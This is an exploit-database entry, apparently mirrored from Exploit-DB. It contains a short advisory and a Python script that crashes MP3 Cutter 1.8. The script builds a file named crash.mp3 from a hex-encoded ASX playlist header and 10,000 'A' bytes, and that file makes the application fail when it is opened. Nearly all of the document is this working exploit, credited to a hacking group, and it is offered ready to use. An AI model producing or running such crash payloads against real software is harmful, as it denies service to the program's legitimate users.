MP3 Cutter 1.8 MP3 – File Processing Remote Denial of Service

  • 作者: Prashant Uniyal
    日期: 2010-07-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34281/
  • source: https://www.securityfocus.com/bid/41506/info
    
    MP3 Cutter is prone to a remote denial-of-service vulnerability.
    
    An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users.
    
    MP3 Cutter 1.8 is vulnerable; other versions may also be affected. 
    
    ##########################################################
    ## Legion of Xtremers & Hackers Garage
    ## (www.loxian.co.cc) (www.garage4hackers.com)
    ## MP3 Cutter 1.8 Crash Exploit
    ##http://www.aivsoft.com/downloads/mp3cutter/download.html
    ## Author: Prashant a.k.a t3rm!n4t0r
    ##c0ntact: happyterminator@gmail.com
    ##
    ##Greetz to: vinnu, b0nd, fb1h2s, Anarki, Nikhil, D4RK3ST
    #########################################################
     
    #exploit.py
     
    #MP3 cutter Crash Exploit
     
    print " MP3 Cutter Crash Exploit ( mp3 file ) \n"
     
    header1 = (
    "\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
    "\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
    "\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
    "\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
    "\x3D\x22"
    )
     
    header2 = (
    "\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
    "\x3E\x3C\x2F\x41\x53\x58\x3E"
    )
     
    crash = "\x41" * 10000
     
    exploit = header1 + crash+ header2
     
    try:
    out_file = open("crash.mp3",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nExploit file created!\n")
    except:
    print "Error"